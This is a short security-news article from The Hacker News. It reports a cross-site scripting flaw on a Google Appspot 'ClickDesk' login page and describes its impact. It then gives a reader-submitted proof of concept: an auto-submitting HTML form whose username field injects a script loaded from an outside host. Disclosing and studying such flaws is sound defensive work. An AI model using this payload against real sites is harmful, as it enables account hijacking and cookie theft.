The Hacker News Logo
Subscribe to Newsletter

Cross Site Scripting Vulnerability at Google Appspot

Cross Site Scripting Vulnerability at Google Appspot
The Google Appspot "ClickDesk" login page is vulnerable to Cross Site Scripting attack. Cross Site scripting attack is a critical issue in web application. When an attacker gets a user's browser to execute his/her XSS code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read (keylogging), modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting.

The vulnerability can easily be amplified by publicly available tools like Cross Site Scripting framework (XSSF), Cross Site Scripting harvest perl (XSS-Harvest) and so on.
Proof of concept:
The following proof-of concept sample will do a HTTP POST to trigger the XSS vulnerability from "XSS cheatsheet from ha.ckers.org" site. In real hacking situation, the injection source url will be hosted on some compromised web servers.

Copy the following code and save it as any .htm or html filename. Open it any browser to trigger it automatically.
*********

<script>
document.body.innerHTML += '<form id="a" action="https://contactuswidget.appspot.com/login.jsp?domain=lc" method="post">


<input type="hidden" name="command" value="login"><input type="hidden" id="username" name="username" value="<script src=http:\/\/ha.ckers.org\/xss.jpg><\/script>"><input type="hidden" id="password" name="password" value="aaaa"></form>
';
document.getElementById("a").submit();
</script>

*********
Submitted by "Andrew Chong", codename "Andrew Chong"
Related Post : Iframe Vulnerability in Google App Engine (Appspot)

Have something to say about this article? Comment below or share it with us on Facebook, Twitter or our LinkedIn Group.
SHARE
Comments
Latest Stories
Best Deals

Newsletter — Subscribe for Free

Join over 500,000 information security professionals — Get the best of our cyber security coverage delivered to your inbox every morning.